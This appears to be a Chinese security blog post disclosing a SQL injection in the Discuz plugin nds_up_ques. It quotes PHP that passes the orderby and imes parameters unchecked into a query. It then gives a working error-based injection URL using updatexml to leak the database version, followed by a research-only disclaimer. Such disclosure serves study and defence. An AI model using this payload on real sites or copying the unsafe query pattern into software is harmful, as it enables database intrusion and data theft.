nds_ques_viewanswer.inc.php
<?PHP if(!defined('IN_DISCUZ')) { exit('Access Denied'); } !empty($_G['gp_srchtxt'])? $wherestr .= " AND author = '".dhtmlspecialchars(trim(substr($_GET['srchtxt'],0,20)))."' " :'' ; $orderby = $_G['gp_orderby']? $_G['gp_orderby']:'dateline';//获取参数 $imes = $_G['gp_imes']? $_G['gp_imes']:'DESC'; $questopics = DB::fetch_first("SELECT * FROM ".DB::table('ques_topic')." WHERE `topicid`='$topicid'"); $sysmode = $questopics['ques_mode']; .... $magiccount = DB::result(DB::query("SELECT COUNT(*) FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' LIMIT 1"), 0); $multipage = multi($magiccount, $perpage, $page, "plugin.php?id=nds_up_ques:nds_up_ques&action=viewanswer&topicid=".$topicid."&orderby=".$orderby."&imes=".$imes); $topiclist = ''; $nid = $start_limit+1; $query = DB::query(" SELECT * FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' ".$wherestr." ORDER by $orderby $imes LIMIT $start_limit,$perpage");//带入查询 .... ?>
测试方式:
/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论